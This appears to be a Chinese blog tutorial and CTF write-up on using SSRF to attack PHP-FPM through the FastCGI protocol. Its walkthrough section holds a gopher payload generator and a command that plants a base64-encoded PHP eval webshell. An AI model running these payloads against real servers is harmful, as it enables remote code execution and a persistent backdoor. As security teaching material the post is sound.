<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="SSRF之攻击fastcgi"><meta name="keywords" content="websec,SSRF,fastcgi"><meta name="author" content="uf9n1x,1916003479@qq.com"><meta name="copyright" content="uf9n1x"><title>SSRF之攻击fastcgi | Uf9n1x's Blog</title><link rel="shortcut icon" href="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Uf9n1x's Blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ssrf%E4%B9%8B%E6%94%BB%E5%87%BBfastcgi"><span class="toc-number">1.</span> <span class="toc-text">ssrf之攻击fastcgi</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E4%BA%86%E8%A7%A3CGI%E3%80%81FastCGI%E3%80%81PHP-FPM"><span class="toc-number">1.1.</span> <span class="toc-text">1.了解CGI、FastCGI、PHP-FPM</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#FastCGI%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.1.</span> <span class="toc-text">FastCGI工作原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP-FPM%E9%80%9A%E4%BF%A1%E6%96%B9%E5%BC%8F"><span class="toc-number">1.1.2.</span> <span class="toc-text">PHP-FPM通信方式</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-FastCGI%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text">2.FastCGI攻击原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#FastCGI%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.2.1.</span> <span class="toc-text">FastCGI协议</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.2.</span> <span class="toc-text">漏洞原理</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-SSRF%E6%94%BB%E5%87%BB%E6%9C%AC%E5%9C%B0%E7%9A%84PHP-FPM"><span class="toc-number">1.3.</span> <span class="toc-text">3.SSRF攻击本地的PHP-FPM</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-number">1.3.0.1.</span> <span class="toc-text">方法一</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%9B%91%E5%90%AC9000%E7%AB%AF%E5%8F%A3"><span class="toc-number">2.</span> <span class="toc-text">监听9000端口</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-number">2.0.0.1.</span> <span class="toc-text">方法二</span></a></li></ol></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"></div><div class="author-info__name text-center">uf9n1x</div><div class="author-info__description text-center">websec</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/uf9n1x">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">44</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">35</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">30</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Some links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.cnblogs.com/uf9n1x/">博客园</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.yuque.com/uf9n1x">语雀</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://music.163.com/">Music</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Uf9n1x's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">归档</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">SSRF之攻击fastcgi</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-16</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/SSRF/">SSRF</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.7k</span><span class="post-meta__separator">|</span><span>阅读时长: 9 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>这篇文章介绍fastcgi的攻击方式。</p>
<span id="more"></span>

<h1 id="ssrf之攻击fastcgi"><a href="#ssrf之攻击fastcgi" class="headerlink" title="ssrf之攻击fastcgi"></a>ssrf之攻击fastcgi</h1><h2 id="1-了解CGI、FastCGI、PHP-FPM"><a href="#1-了解CGI、FastCGI、PHP-FPM" class="headerlink" title="1.了解CGI、FastCGI、PHP-FPM"></a>1.了解CGI、FastCGI、PHP-FPM</h2><p>我们知道，在网站架构中，Web Server（如Nginx）只是内容的分发者</p>
<p>当客户端请求的是index.php，根据配置文件Web Server辨别不是静态文件，此时就需要去找 PHP解析器来处理</p>
<p>当Web Server收到 index.php 这个请求后，会启动对应的CGI 程序，也就是PHP解析器</p>
<p>接下来PHP解析器会解析php.ini文件，初始化执行环境，然后处理请求，再以CGI规范的格式返回处理后的结果，退出进程，Web server再把结果返回给浏览器。这就是一个完整的动态PHP Web访问流程</p>
<p>这其中，引出如下概念：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token constant">CGI</span>：是 Web Server 与 Web Application 之间数据交换的一种协议
<span class="token operator">*</span><span class="token operator">*</span>FastCGI：<span class="token operator">*</span><span class="token operator">*</span>同 <span class="token constant">CGI</span>，是一种通信协议，对比 <span class="token constant">CGI</span> 提升了<span class="token number">5</span>倍以上性能
<span class="token operator">*</span><span class="token operator">*</span><span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">CGI</span>：<span class="token operator">*</span><span class="token operator">*</span>是 <span class="token constant">PHP</span>（Web Application）对 Web Server 提供的 <span class="token constant">CGI</span> 协议的接口程序
<span class="token operator">*</span><span class="token operator">*</span><span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">FPM</span>：<span class="token operator">*</span><span class="token operator">*</span>是 <span class="token constant">PHP</span>（Web Application）对 Web Server 提供的 FastCGI 协议的接口程序，额外还提供了相对智能的任务管理功能
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>PHP默认提供了很多种SAPI（服务器端应用编程端口），常见的提供给apache和nginx的php5_module、CGI、FastCGI，给IIS的ISAPI，以及Shell的CLI</p>
<p>经过不断的技术升级，目前搭建高性能的PHP Web服务器，最佳的方式是Apache/Nginx + FastCGI + **PHP-FPM(PHP-CGI)**方式</p>
<h3 id="FastCGI工作原理"><a href="#FastCGI工作原理" class="headerlink" title="FastCGI工作原理"></a>FastCGI工作原理</h3><pre class="line-numbers language-php"><code class="language-php"><span class="token number">1</span><span class="token punctuation">.</span>Web 服务器启动时载入FastCGI进程管理器（<span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">CGI</span>或者<span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">FPM</span><span class="token punctuation">)</span>
<span class="token number">2</span><span class="token punctuation">.</span>FastCGI 进程管理器自身初始化，启动多个 <span class="token constant">CGI</span> 解释器进程，并等待来自 Web Server 的连接
<span class="token number">3</span><span class="token punctuation">.</span>Web 服务器与 FastCGI 进程管理器进行 Socket 通信，选择一个<span class="token constant">CGI</span> 解释器进程，通过 FastCGI 协议发送 <span class="token constant">CGI</span> 环境变量和标准输入数据给 这个<span class="token constant">CGI</span> 解释器进程 
<span class="token number">4</span><span class="token punctuation">.</span> <span class="token constant">CGI</span> 解释器进程完成处理后将标准输出和错误信息从同一连接返回 Web 服务器
<span class="token number">5</span><span class="token punctuation">.</span><span class="token constant">CGI</span> 解释器进程接着等待并处理来自 Web 服务器的下一个连接
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>由此知道，PHP-FPM 就是一个FastCGI进程管理器，是对于 FastCGI 协议的具体实现，它负责管理一个进程池，来处理来自Web服务器的请求。</p>
<h3 id="PHP-FPM通信方式"><a href="#PHP-FPM通信方式" class="headerlink" title="PHP-FPM通信方式"></a>PHP-FPM通信方式</h3><p>在PHP使用FastCGI连接模式的情况下，Web服务器中间件如Nginx和PHP-FPM之间的通信方式又分为两种，TCP模式和套接字(unix socket)模式</p>
<pre class="line-numbers language-php"><code class="language-php">   <span class="token number">1</span><span class="token punctuation">.</span> <span class="token constant">TCP</span>模式即是<span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">FPM</span>进程会监听本机上的一个端口（默认为<span class="token number">9000</span>），然后Nginx会把客户端请求数据通过FastCGI协议传给<span class="token number">9000</span>端口，<span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">FPM</span>拿到数据后会调用<span class="token constant">CGI</span>进程解析
   <span class="token number">2</span><span class="token punctuation">.</span> Unix套接字模式是Unix系统进程间通信（<span class="token constant">IPC</span>）的一种被广泛采用方式，以文件（一般是<span class="token punctuation">.</span>sock）作为socket的唯一标识（描述符），需要通信的两个进程引用同一个socket描述符文件就可以建立通道进行通信了。上述原理图中提到的Socket 通信即为此模式
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><em><strong>利用SSRF漏洞攻击FastCGI是在TCP模式下进行</strong></em></p>
<h2 id="2-FastCGI攻击原理"><a href="#2-FastCGI攻击原理" class="headerlink" title="2.FastCGI攻击原理"></a>2.FastCGI攻击原理</h2><h3 id="FastCGI协议"><a href="#FastCGI协议" class="headerlink" title="FastCGI协议"></a>FastCGI协议</h3><pre class="line-numbers language-php"><code class="language-php"><span class="token constant">HTTP</span>协议是浏览器和服务器中间件进行数据交换的协议
类比则有
fastcgi协议是服务器中间件和某个语言后端（如<span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">FPM</span>）进行数据交换的协议
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>Fastcgi协议由多个record组成，record也有header和body一说，服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端（PHP-FPM），语言后端（PHP-FPM）解码以后拿到具体数据，进行指定操作，并将结果再按照该协议封装好后返回给服务器中间件</p>
<p>record的头固定8个字节，body是由头中的contentLength指定，其结构如下：</p>
<pre class="line-numbers language-php"><code class="language-php">typedef struct <span class="token punctuation">{</span>
  <span class="token comment" spellcheck="true">/* Header */</span>
  unsigned char version<span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 版本</span>
  unsigned char type<span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 本次record的类型</span>
  unsigned char requestIdB1<span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 本次record对应的请求id</span>
  unsigned char requestIdB0<span class="token punctuation">;</span>
  unsigned char contentLengthB1<span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// body体的大小</span>
  unsigned char contentLengthB0<span class="token punctuation">;</span>
  unsigned char paddingLength<span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 额外块大小</span>
  unsigned char reserved<span class="token punctuation">;</span> 

  <span class="token comment" spellcheck="true">/* Body */</span>
  unsigned char contentData<span class="token punctuation">[</span>contentLength<span class="token punctuation">]</span><span class="token punctuation">;</span>
  unsigned char paddingData<span class="token punctuation">[</span>paddingLength<span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> FCGI_Record<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<pre class="line-numbers language-php"><code class="language-php">语言端（<span class="token constant">PHP</span><span class="token operator">-</span><span class="token constant">FPM</span>）解析了FastCGI头以后，拿到contentLength，然后再在<span class="token constant">TCP</span>流里读取大小等于contentLength的数据，这就是body体

Body后面还有一段额外的数据（Padding），其长度由头中的paddingLength指定，起保留作用不需要该Padding的时候，将其长度设置为<span class="token number">0</span>即可

可见，一个FastCGI record结构最大支持的body大小是<span class="token number">2</span><span class="token operator">^</span><span class="token number">16</span>，也就是<span class="token number">65536</span>字节
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>其中，header中的type代表本次record的类型，所有值及具体含义如下</p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161608000.png"></p>
<p>服务器中间件和后端语言（PHP-FPM）通信，第一个数据包就是type为1的record，后续互相交流，发送type为4、5、6、7的record，结束时发送type为2、3的record</p>
<p>举个例子，用户访问<a target="_blank" rel="noopener" href="http://127.0.0.1/index.php?a=1&amp;b=2%EF%BC%8C%E5%A6%82%E6%9E%9Cweb%E7%9B%AE%E5%BD%95%E6%98%AF/var/www/html%EF%BC%8C%E9%82%A3%E4%B9%88%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD%E9%97%B4%E4%BB%B6%EF%BC%88Nginx%EF%BC%89%E4%BC%9A%E5%B0%86%E8%BF%99%E4%B8%AA%E8%AF%B7%E6%B1%82%E5%8F%98%E6%88%90%E5%A6%82%E4%B8%8Bkey-value%E5%AF%B9%EF%BC%9A">http://127.0.0.1/index.php?a=1&amp;b=2，如果web目录是/var/www/html，那么服务器中间件（Nginx）会将这个请求变成如下key-value对：</a></p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token punctuation">{</span>
    <span class="token string">'GATEWAY_INTERFACE'</span><span class="token punctuation">:</span> <span class="token string">'FastCGI/1.0'</span><span class="token punctuation">,</span>
    <span class="token string">'REQUEST_METHOD'</span><span class="token punctuation">:</span> <span class="token string">'GET'</span><span class="token punctuation">,</span>
    <span class="token string">'SCRIPT_FILENAME'</span><span class="token punctuation">:</span> <span class="token string">'/var/www/html/index.php'</span><span class="token punctuation">,</span>
    <span class="token string">'SCRIPT_NAME'</span><span class="token punctuation">:</span> <span class="token string">'/index.php'</span><span class="token punctuation">,</span>
    <span class="token string">'QUERY_STRING'</span><span class="token punctuation">:</span> <span class="token string">'?a=1&amp;b=2'</span><span class="token punctuation">,</span>
    <span class="token string">'REQUEST_URI'</span><span class="token punctuation">:</span> <span class="token string">'/index.php?a=1&amp;b=2'</span><span class="token punctuation">,</span>
    <span class="token string">'DOCUMENT_ROOT'</span><span class="token punctuation">:</span> <span class="token string">'/var/www/html'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_SOFTWARE'</span><span class="token punctuation">:</span> <span class="token string">'php/fcgiclient'</span><span class="token punctuation">,</span>
    <span class="token string">'REMOTE_ADDR'</span><span class="token punctuation">:</span> <span class="token string">'127.0.0.1'</span><span class="token punctuation">,</span>
    <span class="token string">'REMOTE_PORT'</span><span class="token punctuation">:</span> <span class="token string">'12345'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_ADDR'</span><span class="token punctuation">:</span> <span class="token string">'127.0.0.1'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_PORT'</span><span class="token punctuation">:</span> <span class="token string">'80'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_NAME'</span><span class="token punctuation">:</span> <span class="token string">"localhost"</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_PROTOCOL'</span><span class="token punctuation">:</span> <span class="token string">'HTTP/1.1'</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这个数组其实就是PHP中$_SERVER数组的一部分，也就是PHP里的环境变量。但环境变量的作用不仅是填充$_SERVER数组，也是告诉FPM：“我要执行哪个PHP文件”</p>
<p>当后端语言（PHP-FPM）拿到由Nginx发过来的FastCGI数据包后，进行解析，得到上述这些环境变量。然后，执行SCRIPT_FILENAME的值指向的PHP文件，也就是/var/www/html/index.php</p>
<h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>到这里，PHP-FPM FastCGI未授权访问漏洞也就呼之欲出了。PHP-FPM默认监听9000端口，如果这个端口暴露在公网，则我们可以自己构造FastCGI协议，和FPM进行通信。</p>
<p>此时，我们自行构造SCRIPT_FILENAME的值，就可以控制PHP-FPM执行任意后缀文件，如/etc/passwd</p>
<p>但是，在PHP5.3.9之后，FPM默认配置中增加了security.limit_extensions选项</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token punctuation">;</span> Limits the extensions of the main script <span class="token constant">FPM</span> will allow to parse<span class="token punctuation">.</span> This can
<span class="token punctuation">;</span> prevent configuration mistakes on the web server side<span class="token punctuation">.</span> You should only limit
<span class="token punctuation">;</span> <span class="token constant">FPM</span> to <span class="token punctuation">.</span>php extensions to prevent malicious users to <span class="token keyword">use</span> <span class="token package">other</span> extensions to
<span class="token punctuation">;</span> exectute php code<span class="token punctuation">.</span>
<span class="token punctuation">;</span> Note<span class="token punctuation">:</span> set an empty value to allow all extensions<span class="token punctuation">.</span>
<span class="token punctuation">;</span> <span class="token keyword">Default</span> Value<span class="token punctuation">:</span> <span class="token punctuation">.</span>php
<span class="token punctuation">;</span>security<span class="token punctuation">.</span>limit_extensions <span class="token operator">=</span> <span class="token punctuation">.</span>php <span class="token punctuation">.</span>php3 <span class="token punctuation">.</span>php4 <span class="token punctuation">.</span>php5 <span class="token punctuation">.</span>php7
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>其限定了只有某些后缀的文件允许被FPM执行，默认是.php。</p>
<p>因此，想利用PHP-FPM的未授权访问漏洞，首先就得找到一个已存在的PHP文件。已存在的PHP文件名获得有两种方法：</p>
<pre class="line-numbers language-php"><code class="language-php">通过系统的信息收集、爆破、报错获得某个<span class="token constant">PHP</span>文件名及其路径
找安装<span class="token constant">PHP</span>后默认存在的<span class="token constant">PHP</span>文件，如<span class="token operator">/</span>usr<span class="token operator">/</span>local<span class="token operator">/</span>lib<span class="token operator">/</span>php<span class="token operator">/</span><span class="token constant">PEAR</span><span class="token punctuation">.</span>php
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>现在，拿到了文件名，我们能控制SCRIPT_FILENAME，却只能执行目标服务器上的文件，并不能执行我们想要执行的任意代码，但我们可以通过构造type值为4的record，也就是设置向PHP-FPM传递的环境变量来达到任意代码执行的目的</p>
<p>PHP.INI中有两个有趣的配置项，auto_prepend_file和auto_append_file</p>
<pre class="line-numbers language-php"><code class="language-php">auto_prepend_file是告诉<span class="token constant">PHP</span>，在执行目标文件之前，先包含auto_prepend_file中指定的文件
auto_append_file是告诉<span class="token constant">PHP</span>，在执行完成目标文件后，包含auto_append_file指向的文件
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>若我们设置auto_prepend_file为php://input（allow_url_include=on），那么就等于在执行任何PHP文件前都要包含一遍POST的内容。所以，我们只需要把待执行的代码放在FastCGI协议 Body中，它们就能被执行了</p>
<p>那么我们如何设置PHP.INI中auto_prepend_file的值呢？</p>
<p>我们可以通过PHP-FPM的两个环境变量，PHP_VALUE PHP_ADMIN_VALUE来设置PHP.INI</p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161608094.png"></p>
<p>最终，我们设置向PHP-FPM传递的环境变量：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token punctuation">{</span>
    <span class="token string">'GATEWAY_INTERFACE'</span><span class="token punctuation">:</span> <span class="token string">'FastCGI/1.0'</span><span class="token punctuation">,</span>
    <span class="token string">'REQUEST_METHOD'</span><span class="token punctuation">:</span> <span class="token string">'GET'</span><span class="token punctuation">,</span>
    <span class="token string">'SCRIPT_FILENAME'</span><span class="token punctuation">:</span> <span class="token string">'/var/www/html/index.php'</span><span class="token punctuation">,</span>
    <span class="token string">'SCRIPT_NAME'</span><span class="token punctuation">:</span> <span class="token string">'/index.php'</span><span class="token punctuation">,</span>
    <span class="token string">'QUERY_STRING'</span><span class="token punctuation">:</span> <span class="token string">'?a=1&amp;b=2'</span><span class="token punctuation">,</span>
    <span class="token string">'REQUEST_URI'</span><span class="token punctuation">:</span> <span class="token string">'/index.php?a=1&amp;b=2'</span><span class="token punctuation">,</span>
    <span class="token string">'DOCUMENT_ROOT'</span><span class="token punctuation">:</span> <span class="token string">'/var/www/html'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_SOFTWARE'</span><span class="token punctuation">:</span> <span class="token string">'php/fcgiclient'</span><span class="token punctuation">,</span>
    <span class="token string">'REMOTE_ADDR'</span><span class="token punctuation">:</span> <span class="token string">'127.0.0.1'</span><span class="token punctuation">,</span>
    <span class="token string">'REMOTE_PORT'</span><span class="token punctuation">:</span> <span class="token string">'12345'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_ADDR'</span><span class="token punctuation">:</span> <span class="token string">'127.0.0.1'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_PORT'</span><span class="token punctuation">:</span> <span class="token string">'80'</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_NAME'</span><span class="token punctuation">:</span> <span class="token string">"localhost"</span><span class="token punctuation">,</span>
    <span class="token string">'SERVER_PROTOCOL'</span><span class="token punctuation">:</span> <span class="token string">'HTTP/1.1'</span>
    <span class="token string">'PHP_VALUE'</span><span class="token punctuation">:</span> 'auto_prepend_file <span class="token operator">=</span> php<span class="token punctuation">:</span><span class="token comment" spellcheck="true">//input',</span>
    <span class="token string">'PHP_ADMIN_VALUE'</span><span class="token punctuation">:</span> <span class="token string">'allow_url_include = On'</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>最后两行设置auto_prepend_file = php://input且allow_url_include = On，然后将我们需要执行的代码放在Body中，即可执行任意代码（见文章开头漏洞复现）</p>
<h2 id="3-SSRF攻击本地的PHP-FPM"><a href="#3-SSRF攻击本地的PHP-FPM" class="headerlink" title="3.SSRF攻击本地的PHP-FPM"></a>3.SSRF攻击本地的PHP-FPM</h2><p>生产环境中，除非测试或者图方便之外，PHP-FPM是极少开放在公网的，绝大部分都是启动在本地即监听127.0.0.1:9000地址，这种情况下，如果服务器端存在SSRF漏洞，那么我们就可以借助SSRF来攻击本地PHP-FPM服务，达到任意代码执行的效果</p>
<p>我们通过CTFHub中的一道SSRF FastCGI协议题目具体进行利用</p>
<p>根据前面几篇SSRF系列的文章，我们对gopher协议已经有所了解</p>
<pre class="line-numbers language-php"><code class="language-php">gopher<span class="token punctuation">:</span><span class="token comment" spellcheck="true">//</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>host</span><span class="token punctuation">></span></span></span><span class="token punctuation">:</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>port</span><span class="token punctuation">></span></span></span><span class="token operator">/</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>gopher-path</span><span class="token punctuation">></span></span></span>_后接<span class="token constant">TCP</span>数据流
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>当后接TCP数据流为我们构造的恶意FastCGI协议报文，即可执行恶意命令</p>
<p>根据前文的FastCGI攻击原理分析，我们需要满足三个条件：</p>
<pre><code>PHP版本要高于5.3.3，才能动态修改PHP.INI配置文件（题目环境已满足）
知道题目环境中的一个PHP文件的绝对路径
PHP-FPM监听在本机9000端口（题目环境已满足）
</code></pre>
<p>打开题目链接，我们访问index.php会被重定向，其他任意PHP文件都返回404，说明存在index.php</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token constant">PHP</span>文件的绝对路径<span class="token punctuation">:</span><span class="token operator">/</span><span class="token keyword">var</span><span class="token operator">/</span>www<span class="token operator">/</span>html<span class="token operator">/</span>index<span class="token punctuation">.</span>php
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h4><p>所需条件都满足，我们利用题目附件中P牛的EXP:fpm.php</p>
<p>我们在本机监听9000端口，然后运行fpm.py将恶意FastCGI协议报文数据打在本机的9000端口，保存为exp.txt</p>
<h1 id="监听9000端口"><a href="#监听9000端口" class="headerlink" title="监听9000端口"></a>监听9000端口</h1><pre class="line-numbers language-python"><code class="language-python">nc <span class="token operator">-</span>lvvp <span class="token number">9000</span> <span class="token operator">></span> exp<span class="token punctuation">.</span>txt

<span class="token comment" spellcheck="true"># 运行`fpm.py`</span>

python3 fpm<span class="token punctuation">.</span>py <span class="token number">127.0</span><span class="token punctuation">.</span><span class="token number">0.1</span> <span class="token operator">/</span>var<span class="token operator">/</span>www<span class="token operator">/</span>html<span class="token operator">/</span>index<span class="token punctuation">.</span>php <span class="token operator">-</span>c <span class="token string">"&lt;?php system('echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk 7Pz4 | base64 -d > /var/www/html/shel1.php');die('-----made by pniu----- ');?>"</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>编写exp_urlcode.py将exp.txt进行urlencode编码并输出</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">from</span> urllib <span class="token keyword">import</span> quote
<span class="token keyword">with</span> open<span class="token punctuation">(</span><span class="token string">'exp.txt'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
    pld <span class="token operator">=</span> f<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">print</span> <span class="token string">"gopher://127.0.0.1:9000/_"</span> <span class="token operator">+</span> quote<span class="token punctuation">(</span>pld<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后进行二次编码后将最终的payload内容放到?url=后面发送过去（这里需要进行两次编码，因为这里GET会进行一次解码，curl也会再进行一次解码）</p>
<p>使用中国蚁剑成功连接webshell，在其根目录下即可找到flag</p>
<h4 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h4><p>gopher工具生成payload</p>
<p>与方法一一样，将payload二次编码后发送，然后中国蚁剑成功连接webshell，在其根目录下即可找到flag</p>
